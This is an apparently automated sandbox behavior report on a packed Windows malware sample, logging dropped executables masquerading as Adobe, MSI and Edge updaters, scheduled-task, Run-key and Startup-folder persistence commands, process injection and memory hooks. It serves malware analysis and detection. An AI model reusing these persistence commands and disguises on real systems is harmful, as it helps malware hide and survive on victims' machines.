Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe "C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe"
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
Source: unknown	Process created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe "C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe "C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 LG" /sc ONLOGON /rl HIGHEST			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe "C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe"			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c HR" /sc HOURLY /rl HIGHEST			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c LG" /sc ONLOGON /rl HIGHEST			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe "C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe"			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"			Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Telemetry Logging" /tr "C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe"			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: d3d11.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dxgi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: resourcepolicyclient.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: d3d10warp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dxcore.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: devobj.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vaultcli.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: linkinfo.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntshrui.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cscapi.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: d2d1.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Section loaded: ntmarta.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Section loaded: windows.storage.dll			Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Section loaded: wldp.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll			Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe	Section loaded: apphelp.dll			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe	Section loaded: apphelp.dll			Jump to behavior

Source: EdgeMS2.lnk.0.dr

LNK file: ..\..\..\..\..\..\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: file.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: file.exe

Static file information: File size 3679520 > 1048576

Source: file.exe

Static PE information: Raw size of .vmp,,,2 is bigger than: 0x100000 < 0x37e000

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe	Unpacked PE file: 7.2.dD08ulq4N33OmW5HQdwT.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Unpacked PE file: 8.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe	Unpacked PE file: 11.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe	Unpacked PE file: 14.2.oobeldr.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe	Unpacked PE file: 21.2.JcZ7W4aCxlpc4pOVLwL1.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe	Unpacked PE file: 22.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe	Unpacked PE file: 23.2.MSIUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe	Unpacked PE file: 24.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe	Unpacked PE file: 25.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe	Unpacked PE file: 28.2.AdobeUpdaterV2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe	Unpacked PE file: 29.2.EdgeMS2.exe.400000.0.unpack .MPRESS1:EW;.MPRESS2:EW;.rsrc:W; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0098C630 VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,LoadLibraryA,GetProcAddress,WriteProcessMemory,CreateRemoteThread,

0_2_0098C630

Source: initial sample

Static PE information: section where entry point is pointing to: .vmp,,,2

Source: file.exe	Static PE information: section name: .vmp,,,0
Source: file.exe	Static PE information: section name: .vmp,,,1
Source: file.exe	Static PE information: section name: .vmp,,,2
Source: l2[1].exe.0.dr	Static PE information: section name: .MPRESS1
Source: l2[1].exe.0.dr	Static PE information: section name: .MPRESS2
Source: dD08ulq4N33OmW5HQdwT.exe.0.dr	Static PE information: section name: .MPRESS1
Source: dD08ulq4N33OmW5HQdwT.exe.0.dr	Static PE information: section name: .MPRESS2
Source: AdobeUpdaterV2.exe.0.dr	Static PE information: section name: .MPRESS1
Source: AdobeUpdaterV2.exe.0.dr	Static PE information: section name: .MPRESS2
Source: MSIUpdaterV2.exe.0.dr	Static PE information: section name: .MPRESS1
Source: MSIUpdaterV2.exe.0.dr	Static PE information: section name: .MPRESS2
Source: EdgeMS2.exe.0.dr	Static PE information: section name: .MPRESS1
Source: EdgeMS2.exe.0.dr	Static PE information: section name: .MPRESS2
Source: k[1].exe.0.dr	Static PE information: section name: .MPRESS1
Source: k[1].exe.0.dr	Static PE information: section name: .MPRESS2
Source: JcZ7W4aCxlpc4pOVLwL1.exe.0.dr	Static PE information: section name: .MPRESS1
Source: JcZ7W4aCxlpc4pOVLwL1.exe.0.dr	Static PE information: section name: .MPRESS2
Source: AdobeUpdaterV2.exe0.0.dr	Static PE information: section name: .MPRESS1
Source: AdobeUpdaterV2.exe0.0.dr	Static PE information: section name: .MPRESS2
Source: MSIUpdaterV2.exe0.0.dr	Static PE information: section name: .MPRESS1
Source: MSIUpdaterV2.exe0.0.dr	Static PE information: section name: .MPRESS2
Source: EdgeMS2.exe0.0.dr	Static PE information: section name: .MPRESS1
Source: EdgeMS2.exe0.0.dr	Static PE information: section name: .MPRESS2
Source: oobeldr.exe.7.dr	Static PE information: section name: .MPRESS1
Source: oobeldr.exe.7.dr	Static PE information: section name: .MPRESS2

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AF0156 push ebx; iretd		0_2_00AF0172
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BFE2E4 push cs; ret		0_2_00BFE2EB
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00BCA2D2 push ss; iretd		0_2_00B7AF53
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B9062A push esi; ret		0_2_00B9064D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B90625 push esi; ret		0_2_00B9064D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AC4D29 push ecx; retf		0_2_00AC4E22
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B674FC push ecx; ret		0_2_00B67503
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00AAB88B push ss; iretd		0_2_00AAB903
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B2B96C push edi; retf		0_2_00B2B9D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00A5FB21 push ecx; ret		0_2_00A5FB34
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00B33DCB push es; ret		0_2_00B3859B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_008F3F49 push ecx; ret		0_2_008F3F5C
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe	Code function: 7_2_006D50A5 push ebp; ret		7_2_00721C57

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\JcZ7W4aCxlpc4pOVLwL1.exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\k[1].exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\AdobeUpdaterV2.exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\EdgeMS2_c81e728d9d4c2f636f067f89cc14862c\EdgeMS2.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\span_lgbWpHb9dJ2\dD08ulq4N33OmW5HQdwT.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\l2[1].exe			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe			Jump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe" /tn "MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26 HR" /sc HOURLY /rl HIGHEST

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS2.lnk

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV2_c81e728d9d4c2f636f067f89cc14862c			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\file.exe	Memory written: PID: 6460 base: 2FF0005 value: E9 2B BA EC 73			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: PID: 6460 base: 76EBBA30 value: E9 DA 45 13 8C			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: PID: 6460 base: 3000008 value: E9 8B 8E F0 73			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: PID: 6460 base: 76F08E90 value: E9 80 71 0F 8C			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: PID: 6460 base: 3020005 value: E9 8B 4D A5 72			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Memory written: PID: 6460 base: 75A74D90 value: E9 7A B2 5A 8D			Jump to behavior
